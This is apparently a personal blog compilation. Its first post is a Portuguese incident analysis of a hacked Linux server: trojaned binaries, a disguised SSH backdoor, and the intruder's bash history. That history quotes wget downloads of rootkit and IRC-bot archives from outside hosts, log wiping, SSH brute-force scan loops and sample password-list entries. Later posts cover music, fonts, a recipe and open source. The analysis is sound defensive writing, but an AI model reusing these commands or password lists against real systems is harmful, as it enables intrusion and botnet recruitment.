Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:26:27 sshd[PID]: refused connect from  IP.IP.IP.IP

Eles mostravam que o IDS (Intrusion Detection System) de B acusou que a máquina atacada (cujo endereço IP está representado por IP.IP.IP.IP) tentou se logar várias vezes sem sucesso em seu serviço SSH (sshd). Reparem que o instante de todas as tentativas, até os segundos, é o mesmo, o que leva a crer que não é um ser humano, e sim algum software que muito rapidamente está testando várias combinações de usuário e senha ao mesmo tempo.

Histórico do Ataque

Fui chamado para dar explicações porque havia fornecido informalmente por telefone algumas dicas de como proteger a máquina. Primeiramente, era necessário dar subsídios ao provedor P para responder ao e-mail de B, dando uma satisfação formal. Isso é uma atitude de responsabilidade de um bom administrador de rede, e demonstra a preocupação em manter o nível de serviço da Internet o mais alto possível.

A máquina foi colocada em quarentena, desligada da Internet e começamos a analisá-la. Tratava-se de um Red Hat Enterprise Linux 3 Update 5. Não estou dizendo que o Red Hat Linux é menos ou mais seguro. Isso não é muito intuitivo de se entender, mas segurança não tem quase nada a ver com o software. Segurança não é um firewall, não é criptografia, nem um conjunto de produtos que tem proteção como objetivo. Segurança é um processo que deve ser seguido conscientemente por administradores de redes. Se um ataque acontece, toda a responsabilidade é do administrador, e não do sistema operacional, seja ele qual for, e do fabricante que for. O administrador precisava agora descobrir como o cracker invadiu para, corajosamente, assumir a falha e não permitir que isso aconteça novamente.

Logo no boot da máquina observamos consecutivas mensagens estranhas que não deviam estar lá e que continham o texto “(swap)”. Começamos a analisar o processo de inicialização do sistema, a partir do arquivo /etc/inittab. Vimos que um dos primeiros scripts que são executados no sistema é o /etc/init.d/functions e fizemos os seguintes testes:

bash$ rpm -qf /etc/init.d/functions
initscripts-7.93.20.EL
bash$ rpm -V initscripts
S.5....T c /etc/rc.d/init.d/functions

Verificamos que este arquivo faz parte (rpm -qf) do pacote initscripts, e em seguida testamos sua integridade (rpm -V). Descobrimos que o arquivo foi alterado: o número 5 significa que o MD5 do arquivo mudou, ou, em outras palavras, que o conteúdo do arquivo mudou. O RPM sabe disso comparando o MD5 do arquivo atual no disco, com o MD5 registrado em seu banco de dados no momento da instalação do pacote.

Mas o que foi alterado no script functions ?

A última linha do script era esta:

/usr/bin/crontabs -t1 -X53 -p

Suspeitamos imediatamente porque o comando crontab não se chama “crontabs”. Confirmamos novamente com o RPM:

bash$ rpm -qf /usr/bin/crontabs
o ficheiro /usr/bin/crontabs não pertence a nenhum pacote

Pronto. Estava constatado que esse tal comando crontabs era alienígena e não deveria estar ali. Foi, com certeza, implantado pelo cracker. Mas não paramos aqui. Queríamos saber o que este programa fazia. Como era um binário, tentamos extrair algumas strings dele:

bash$ strings /usr/bin/crontabs
[...]
"smbd -D"
"(swapd)" &
[...]

Ou seja, era este tal crontabs que mandava para a tela as mensagens com a string “(swap)”. Mas descobrimos outra coisa: o alienígena continha também a string “smbd -D”, que se parece com o nome do serviço do Samba. Nem perdemos tempo usando os comandos ps e top para verificar se um processo chamado smbd estava rodando porque usamos os mesmos rpm -qf e rpm -V para constatar que estes programas também foram modificados pelo cracker. Usamos o utilitário gráfico ksysguard (que não foi modificado) do KDE e pudemos observar um tal processo smbd -D rodando. Chamou a atenção que o ksysguard mostrava todos os processos executando sem seus parâmetros, e somente o smbd apresentava um parâmetro. Não tardou a acharmos um arquivo chamado “/usr/bin/smbd -D” (com espaço e parâmetro mesmo), e o RPM novamente nos informou que ele não fazia parte de nenhum pacote. Tratava-se de outro programa do cracker. Fomos lá tentar extrair mais algumas informações sobre este programa:

bash$ strings “/usr/bin/smbd -D"
[...]
Received SIGHUP; restarting.
Generating new %d bit RSA key.
RSA key generation complete.
   -b bits    Size of server RSA key (default: 768 bits)
By-ICE_4_All ( Hackers Not Allowed! )
SSH-%d.%d-%.50s
This server does not support your new ssh version.
Sent %d bit public key and %d bit host key.
sshd version %.100s [%.100s]
[...]

Omitimos diversas linhas para ser mais didático. A linha vermelha eliminou qualquer dúvida se um cracker havia visitado a máquina ou não. Mas o mais interessante são as linhas azuis, que levaram a crer que o famigerado programa smbd -D era um servidor SSH. O cracker deveria querer isso para manter um backdoor aberto, e poder logar com SSH quando quisesse. Em /var/log/messages encontramos a evidência final:

Feb  19 19:24:49 localhost smbd -D: RSA1 key generation succeeded
Feb  19 19:24:50 localhost smbd -D: RSA key generation succeeded
Feb  19 19:24:51 localhost smbd -D: DSA key generation succeeded
Feb  19 19:24:51 localhost smbd -D:  succeeded

Essas são mensagens típicas de um daemon SSH sendo executado pela primeira vez, quando cria suas chaves únicas de criptografia, só que bizarramente emitidas por um suposto programa com nome de Samba, o que não faz sentido algum e é forte indício que há algo errado no sistema. Ou seja, o cracker implantou um backdoor SSH, porém com um nome mascarado para seu arquivo e processo (smbd). A partir desses registros pudemos também estimar a data em que a máquina foi atacada: 19 de fevereiro.

Para o cracker poder alterar arquivos e comandos tão importantes do sistema, ele deve ter conseguido acesso de root, e por isso fomos espiar o histórico de comandos executados por este usuário no arquivo /root/.bash_history, e vimos isto:

bash# less /root/.bash_history
[...]
cd /usr/share/.a
wget lamisto.octopis.com/mig.tgz
tar xzvf mig.tgz
./mig g-u root -n 0
./mig -u root -n 0
cd /usr/share/.a
wget utilservices.iasi.rdsnet.ro/~marianu/flo.tgz
tar xzvf flo.tgz...linhas omitidas...
cd /var/tmp
wget djanda.com/get/usr.tar.gz
wget djanda.com/get/x.tar.gz
tar xfvz usr.tar.gz
cd usr
chmod +rwxrwxrwx *
./crond
cd ..
tar xfvz x.tar.gz
cd x
chmod +rwxrwxrwx *
mv unix x
./x 201.20; ./x 201.21; ./x 201.22; ./x 201.23; ./x 201.24; ./x 201.25; ./x 201. 26; ./x 201.27; ./x 201.28; ./x 201.29; ./x 201.30; ./x 201.31; ./x 201.32; ./x 201.33; ./x 201.34; ./x 201.35; ./x 201.36; ./x 201.37; ./x 201.38; ./x 201.39; ./x 201.40; ./x 201.41; ./x 201.42; ./x 201.43; ./x 201.44; ./x 201.45; ./x 201. 46; ./x 201.47; ./x 201.48; ./x 201.49; ./x 201.50
[...]
/usr/sbin/adduser scanning

O formato do arquivo não permite saber quando esses comandos foram executados, mas fica evidente que o cracker criou um usuário chamado scanning, baixou arquivos de certos sites, abriu-os e executou comandos que vieram com eles. Analisamos cada um, e descobrimos que:

  • No diretório /usr/share/.a ele instalou e executou o tal comando mig que aparentemente é um limpador de histórico de login do sistema. Usamos o mesmo comando strings para analisar esse binário. Isso confirmou nossa estimativa da data de ataque pois o comando last (usado para verificar esse histórico) apontou dados inconsistentes por volta de 19 de fevereiro.
  • Em /var/tmp foi baixado um tal usr.tar.gz, que aparentemente é um bot de IRC. Mais tarde, com os mesmos comandos do RPM, descobrimos que o comando /bin/netstat também foi alterado, provavelmente para esconder as conexões deste bot a diversos servidores de IRC na porta padrão 6667, o que constatamos com o ksysguard. Adiante explicaremos o que um cracker faz com isso.

Mas o mais interessante foi o x.tar.gz baixado. Continha dois executáveis chamados find e take, o script chamado simplesmente de x, e um arquivo muito especial de nome code.conf. Lendo o simplíssimo script x, vendo no histórico como ele era executado muitas vezes, e usando a intuição, ficou claro que o comando find varria faixas IP inteiras em busca de portas 22 (SSH) abertas. Os hosts encontrados eram então passados para o comando take, que se encarregava de usar as 18459 combinações de usuário e senha disponíveis no arquivo code.conf para tentar se logar nas máquinas encontradas. Um login bem sucedido tinha o IP, usuário e senha registrados num arquivo que indicaria ao cracker as próximas máquinas a invadir. E sim, este arquivo já tinha uma lista de hosts e respectivas senhas em que essas ferramentas conseguiram penetrar.

Foi exatamente esse procedimento de login por força bruta que foi detectado pelo IDS da empresa B, quando o servidor deles tentou ser invadido sem sucesso.

Quando chegamos a isso, ainda não estava claro como a máquina de A foi invadida. Estava checando se e como os administradores da máquina seguiram meus conselhos informais de segurança, verificando as regras de iptables, serviços ativos, etc. Parecia tudo correto, ou não alarmantemente errado. Foi quando demos uma olhada com mais atenção no conteúdo do code.conf e entre suas mais de 18 mil linhas encontramos estas:

root passw0rd
root pa55word
root pa55w0rd
sapdb sapdb
apache apache
apache 123456
apache2 apache
apache2 apache2
apache2 apache123

Enquanto varríamos o arquivo com os olhos, de repente o administrador da máquina colocou a mão na testa, e com voz de lamento nos contou que a senha de root era a manjadíssima passw0rd (com um algarismo zero no lugar da letra ‘o’)! O serviço SSH estava aberto e permitia login do root pela rede. Aquela máquina também tinha sido vítima do scan do cracker, e foi assim que ele entrou e ganhou poder total.

Eu conhecia várias máquinas formais e informais que implementaram aquele mesmo esquema de segurança que foi sugerido, estavam anos conectadas à Internet, e nunca sofreram ataques. Mas uma simples senha conhecida, bem típica de ambientes de testes onde várias pessoas compartilham acessos similares e informais às máquinas, foi o calcanhar de Aquiles da pilha de segurança. Isso confirma que ataques bem sucedidos são sempre responsabilidade do administrador, e nunca do software de segurança em especial.

A Reinstalação da Máquina

Depois de um ataque como esse, e depois do relatório conclusivo, a melhor coisa é limpar completamente o disco e partir para uma reinstalação completa. Desta vez acompanhei de perto a instalação, e seguimos algumas regras simples de segurança:

  • Só instalamos pacotes que sabíamos que seriam usados. Descartamos completamente a idéia de fazer uma instalação completa.
  • Depois de instalado, desligamos alguns serviços que sabíamos que não seriam usados, como NIS, Samba, Portmap, NFS. E se possível os desinstalávamos.
  • Criamos regras para o iptables fechando praticamente tudo menos as portas 80 (HTTP) e 443 (HTTPS).
  • Requisitamos ao provedor do link P que configurasse regras semelhante em seu roteador, formando um firewall duplo.
  • Por via das dúvidas, desabilitamos o acesso por SSH ao root, obrigando o administrador a se logar com um usuário qualquer e depois ganhar privilégios com o comando su. Isso funciona como uma restrição dupla para administrar a máquina.
  • E dessa vez foram usadas senhas decentes, bem difíceis, com letras, números, e que não eram derivadas de palavras óbvias.
  • As senhas só foram informadas verbalmente para poucas pessoas. Evitamos passar por e-mail.

Por que o Cracker Ataca ?

Uma coisa que vale explicar é o bot de IRC. Ele serve para fazer ataques de DDoS (Distributed Denial of Service). Um bot fica constantemente conectado a uma sala de IRC pré-definida. Depois de invadir várias máquinas e ativar os respectivos bots, o cracker entra nessa sala de IRC e tem ao seu dispor um exército de bots distribuídos programados para executar ações ao seu comando. O DDoS acontece quando o cracker, via comandos aos bots na sala de IRC, faz os computadores invadidos enviarem simultaneamente grandes pacotes de dados para algum site-vítima, escolhido pelo cracker. Naquele momento, o link do site-vítima fica sobrecarregado, e a sensação é que ele está fora do ar. Isso pode durar o tempo que o cracker desejar.
Ataque Distributed Denial of Service

Esse processo foi ricamente detalhado pelo dono de um desses site-vítima, em grc.com/dos/grcdos.htm, e é leitura obrigatória a qualquer um que se interessa por segurança.

Em todas as análises que fizemos, não encontramos nada de útil no ataque do cracker. A máquina estava conectada a outras redes, mas não pareciam interessá-lo. A única conclusão que pudemos chegar é que o cracker ataca por atacar, e depois usa seu ataque para atacar mais. Só. Simplesmente isso. Sim, porque as ferramentas, técnicas e rastros deixados mostram que ele provavelmente usou ferramentas criadas por outros, talvez seguindo uma documentação que mostra os comandos prontos, passo a passo. Sem saber direito o que estava fazendo. Sem objetivos “mitnickianos”, nem financeiros, nem algo que o exaltasse perante outros crackers.

Só Freud explica…

Como Enganar Seus Sentidos

  1. Arrume 3 bacias ou 3 recipientes em que caibam suas mãos
  2. Coloque água gelada numa, água quente (mas não pelando) em outra, e água normal na terceira
  3. Mergulhe a mão esquerda na de água gelada e a direita na quente, e espere 30 segundos
  4. Tire e mergulhe as duas mãos juntas na terceira bacia e somente usando seus sentidos diga se ela está quente ou fria
  5. Preste atenção na temperatura que cada mão sente

Crianças adoram esta experiência.

Para os adultos, esta experiência tem uma “moral da estória” que depois eu conto.

Viola and Rabeca

The brazilian Viola Caipira has nothing to do with the orchestral Viola, used mostly in classical performances. It was brought to Brazil by the first portuguese people, and modified and evolved, making it almost a genuine, Brazilian-only instrument now.

It is used mostly on country-side small cities or farm regions of Brazil. And songs played with Viola Caipira sound like these places: home-made food, green landscapes, country life.

Almir Sater is a well known violeiro that used to be more active with the viola, and as an example, one of its beautiful compositions, Luzeiro, was used to open an old TV show focused on farming.

ViolaThere are other excellent violeiros, as Paulo Freire [blog], Roberto Correa, Ivan Vilela, Braz da Viola and many others. Levi Ramiro is one of my favorites, with its Estiva Grande.

Songs played with Viola use to be accompanied by a Rabeca, a sort of simplified violin. Luis Eduardo Gramani was one of our masters in Rabeca compositions, writing beautiful songs as Deodora.

Do not forget to right click on each song link to download the hi-fi MP3 file.

O Carroceiro e o Fauno

Carroceiro no Conjunto NacionalOntem fui ao cinema assistir O Labirinto do Fauno.

Mas não vim falar sobre isso, e sim sobre a escultura gigantêsca, muito bem feita, realista e impressionante de um carroceiro descansando, sua carroça cheia de tralhas e seu cão, que plantaram bem no meio da galeria do Conjunto Nacional. Parece que a obra chama-se O Fazedor de Montanhas de Silvio Galvão.

Paulistanos, não percam. Vá até lá descobrir o que ele está segurando em sua mão esquerda, e não contente-se com esta foto.

Ah, e o filme é bem bom também. Pesado, mas bom. Vale a pena.

Freetype with Bytecode Interpreter

I am the maintainer and writer of most of the official Linux Font-HOWTO [official home], and one of its main points is to explain what is the TrueType Bytecode Interpreter.

I spent some time this morning updating the freetype package on my system [get RPMs], compiling it with support to BCI, and I took the chance to get some “before & after” screenshots of Konqueror browser accessing Google Mail with and without BCI.

Check it out. This is better than makeup ads:

Before: Original Freetype lib without BCI After: New Freetype RPM compiled with BCI
freetype4-nbci.png freetype4-bci.png
freetype1-nbci.png freetype1-bciaa.png freetype1-bci.png
freetype2-nbci.png freetype2-bciaa.png freetype2-bci.png
freetype3-nbci.png freetype3-bciaa.png freetype3-bci.png

After switching to BCI-enabled freetype, the use of Webcore fonts without anti-aliasing gives much much much better results, as you can see. Unfortunately these fonts are not free, but they are better than the popular Bitstream Vera fonts because they include hinting information.

BTW, anti-aliasing is useful in 2 situations only: if you are rendering fonts in big sizes (bigger than 13px), or if you have bad, non-hinted fonts (as Bitstream Vera) with a bad font rendering library (as Freetype without BCI support). If you have good hinted fonts and a good rendering library (as Freetype with BCI), restrict anti-alising only for big font sizes.

My Podcasts

A podcast is a blog that, in addition to text, also publishes media files. So you need a special “reader” to listen them, so people use softwares like iTunes, Amarok, iPodder to subscribe and automatically get the media.

I’m officially releasing my podcasts here, posting songs in high quality MP3 format. These are the channels, subscribe using the orange buttons below:

Enjoy.

Parafuso

Parafuso is an instrumental masterpiece by brazilian Ronen Altman, played by the Orquestra Popular de Câmara.

OPC sort of brought a globalization conscience to brazilian instrumental music, mixing together a great number of instruments and musical styles. They are in evidence in the innovative tradition of brazilian jazz from São Paulo.

If this song was a building, it would look like modern architecture: functional, beautiful, strong and light.

Enjoy.

Receita de “Apio”

Esta receita chama-se Apio porque é assim que os búlgaros — prováveis inventores do preparo — a chamam, e por falta de um nome melhor. É um prato delicioso, fácil de fazer, leve, refrescante, e quem prova quer a receita.

Apio é aipo em ladino, espanhol etc. Aipo é a raiz do salsão, também conhecido como celery. É preciso um pouco de insistência para achá-lo nas feiras do Brasil.

Há dois tipos de salsão: o branco americano, e o mais escuro (com raiz ainda branca). É deste último que se aproveita os melhores aromas, e cujas folhas e caule emprestam mais sabor a molhos etc. O salsão branco quase não tem gosto, e dele não se usa a raiz.

Ingredientes

  • 3 raizes de aipo
  • 4 ou 5 cenouras médias
  • suco de 1 limão
  • 2 colheres de sopa de azeite virgem
  • Adoçante ou açúcar
  • Sal a gosto
  • Água

Modo de Preparo

  1. Descasque as raizes de aipo. Se você encontrar lesmas no meio, por favor remova-as se você for me convidar para jantar.
  2. Lave as raizes descascadas, fatie com meio centímetro de grossura ou menos, e corte no meio as fatias grandes. Vá juntando num recipiente com água para ajudar a não escurecer.
  3. Descasque as cenouras, fatie e junte para cozinhar numa panela grande com o azeite já quente. Vá mexendo.
  4. Escorra e junte o aipo fatiado nas cenouras que já devem estar meio cozidas.
  5. Misture bem adicionando 2 copos de água.
  6. Deixe ferver por uns 15 minutos em fogo baixo.
  7. Adicione sal a gosto, adoçante (umas 20 gotas ou o equivalente em açúcar) e o suco de limão. É importante ficar levemente doce.
  8. Deixe cozinhar por mais uns 5 minutos, até diminuir bastante a água, mas não completamente.
  9. Teste a dureza do aipo e cenoura para ver se estão prontos. Se precisar de mais tempo, garanta que há sempre um dedo de água no fundo da panela.

A cenoura tem duas missões nesta receita: emprestar sua cor vibrante ao prato e tomar emprestado o aroma delicado e exótico da raiz de aipo.

Sirva frio, possivelmente como uma deliciosa entrada. Isto é uma rara iguaria.

Sobre Podcast

Uma vez perguntei a um amigo o que é um podcast, e ele disse que é um MP3. Bem, isso é tão minimalista quanto dizer que um Gaudí é um amontoado de tijolos, ou que a Internet é uma porção de bits dançantes.

Um podcast é um blog não-textual. Seu conteúdo pode ser audio e/ou vídeo, rodeado por metainformações do tipo “autor”, “entrevistado”, “banda”, “estilo”, “sumário” etc.

Como todo blog, ele tem regularidade: “episódios” no lugar de posts e assim por diante.

Você “assina” um podcast como assina uma revista, da mesma forma como assina um blog (via RSS ou ATOM). Mas como um browser é um leitor essencialmente textual, é mais comum e prático assinar podcasts usando softwares de mídia: iTunes, Yahoo! Music Engine, Amarok, etc.

Na convergência das coisas, um podcast pode ser comparado a um programa de rádio onde o próprio ouvinte decide quando e como vai ouvi-lo.

Num mundo onde tivermos banda larga no ar tão abundante e livre quanto ondas de rádio, além da memória para freqüências de estações, os rádios de nossos carros terão também a assinatura de nossos podcasts preferidos. Com ainda não chegamos a isso, temos que usar MP3 players modernos como o iPod – que tratam podcasts de forma especial – para termos essa funcionalidade.

E nesse mundo, os podcasters seremos você e eu, pessoas comuns falando diretamente para o mundo. Publicar um podcast é tão simples quanto publicar posts num blog. É inclusive algo que se pode integrar com plataformas de blogs comuns, com plugins para WordPress, etc.

Se você tem um fluxo de coisas para dizer, crie um podcast. Se você tem um fluxo de coisas para serem assistidas, crie um podcast. Se você tem um fluxo de coisas que quer que as pessoas ouçam, crie um podcast. Este último é o meu caso, sobre Jazz Brasileiro, e por isso estou juntando os pedaços e os módulos para criar um.

Andei estudando isso ultimamente, e achei importante compartilhar…

HD de 1 Terabyte, para quem ?

Vão anunciar o HD de 1 Terabyte.

Tempos atrás, fiz um estudo sobre clusters de alta disponibilidade e a certa altura levantei o sizing real de storage de aplicações de servidor. O resultado está aqui:

Sizing

Adicionando a essa lista, lembro quando a DBA de um grande e famoso supermercado online me chamou para mostrar que a RAM do servidor do DB (1.5GB) era maior que o próprio DB (1GB), que incluia lista de todos os produtos, todos os clientes, todos os carrinhos que já passaram por lá, e tabelas de controle.

Instalações oversized é algo muito comum hoje em dia porque arquitetos costumam usar sua sensibilidade de uso de desktop ao definir RAM, storage, CPU etc de um servidor.

Bem, saibam que desktop é uma das coisas que mais exige RAM, disco (em velocidade e tamanho) e CPU, porque é onde o usuário é mais sensível a atrasos no tempo de resposta (a famosa ampulheta), e tem sempre muita multimídia para aramazenar e tocar.

Aplicações de server são em geral muito mais leves, salvo algumas poucas exceções.

Um HD de 1 terabyte, hoje, faz muito mais sentido para uso pessoal do que em server. Mas é a tendência natural das coisas, e não vamos puxar o freio de mão para esse crescimento (e barateamento), não é mesmo !?

Open Source na Prática

O primeiro a propor a idéia de Open Source Software (OSS) foi Richard Stallman na década de 1970, que a formalizou, com a ajuda de alguns advogados, na famosa licença GPL.

Ninguém se interessou ou sequer ouviu falar sobre isso, até que em meados da década de 1990, tudo mudou com a vertiginosa popularização do Linux, sistema operacional OSS.

O termo popular “Software Livre” não é a melhor tradução de Open Source Software, cujo correto é Software de Código Fonte Aberto. É importante notar isso porque muitas vezes o termo é erradamente associado a idéia de não-proprietário, ou não-comercial. A verdade é que um software pode ter seu código fonte aberto mas ser comercial e/ou proprietário e vice-versa, portanto são conceitos que não devem ser confundidos.

A idéia é simples: eu escrevo um programa e você pode copiá-lo à vontade sem nem sequer me notificar. Pode inclusive modificá-lo e redistribuí-lo, contanto que também mantenha suas modificações abertas e informe qual a origem e os autores anteriores do software.

Isso não quer dizer que teremos diversas versões desconexas do mesmo software, num dado momento. Cada modificação passa por um processo muito bem organizado de aceitação ou rejeite, onde boas melhorias retornam à base e são incorporadas à nova versão do software. Na verdade, hoje, a maioria dessas contribuições não é mais feita por indivíduos, mas por empresas de tecnologia.

É comum — e errado — pensar que OSS significa a morte de todo software de código fechado. Isso não acontece porque a tendência é que as grandes inovações continuem a ser exploradas pelo modelo fechado. Imagine um mundo hipotético que ainda não conhece editores de planilhas. É natural que, ao lançar esse produto, seu inventor opte pelo modelo de código fonte fechado, para maximizar seus lucros através do total controle de sua invenção. Contudo, conforme essa invenção se populariza, desenvolve um mercado e adquire concorrentes, OSS surge como uma das formas — a mais inovadora — para repensá-la. OSS inova ao reimplementar o que outros inventaram e exploraram anteriormente. Recentemente, porém, a indústria começou a usar OSS diretamente para lançar certas inovações, justamente pelo seu poder de agregar comunidades e criar ecossistemas.

Também é comum — e errado — acreditar que se o software em si é gratuito, elimina-se por completo os gastos. Mas sempre haverá a necessidade de um suporte confiável. OSS altera o eixo do valor agregado do software, movendo-o do software em si (que não custa nada), para o serviço de suporte.

Open Source, Open Standards relacionados a TI

Em seu processo de amadurecimento, a única diferença prática entre um software OSS e outro de código fonte fechado é a ordem em que as coisas acontecem. Um fabricante comercial terá que criar estrutura e suporte regional antes de vender o produto. Já no OSS, ofertas de suporte só surgem (espontaneamente) depois que ele goza de uma boa gama de usuários. Mas seja qual for a ordem, a única coisa que garante maturidade a qualquer software ou produto é um ciclo de desenvolvimento–uso–suporte, que estimula mais desenvolvimento. Somente essa maturidade garante a aceitação do produto em empresas responsáveis. E hoje, OSSs como Linux, Apache, OpenOffice.org, Samba, e outros já gozam desse ecossistema cíclico de uma forma vasta, global e vigorosa.

Hoje, OSS tem aplicações mais maduras em infraestrutura e alguns nichos de middleware. Por sua vez, os softwares de código fonte fechado apresentam maior desenvoltura mercadológica nas funcionalidades de maior valor agregado ao negócio (ERPs, CRMs ou processos empresariais). Isso porque estas funcionalidades têm uma amplitude menor de usuários, o que inviabiliza o surgimento de suporte espontâneo — fator vital para a maturidade do OSS.

A indústria tem buscado um balanço saudável para misturar componentes fechados com OSS, a fim de maximizar o seu benefício sem abrir mão da maturidade de ponta a ponta. Prova disso é que tem sido cada vez mais comum a implantação de ERPs maduros — geralmente de código fechado — sobre plataformas abertas maduras — como distribuições Linux com suporte.

A receita para o melhor balanço é insistir no uso de Padrões Abertos. Por garantirem uma interoperabilidade fácil entre camadas abertas e de código fechado, o uso de padrões amplia as escolhas e a liberdade da empresa que compra TI para compor a melhor mistura do momento, com opções OSS e/ou de código fechado.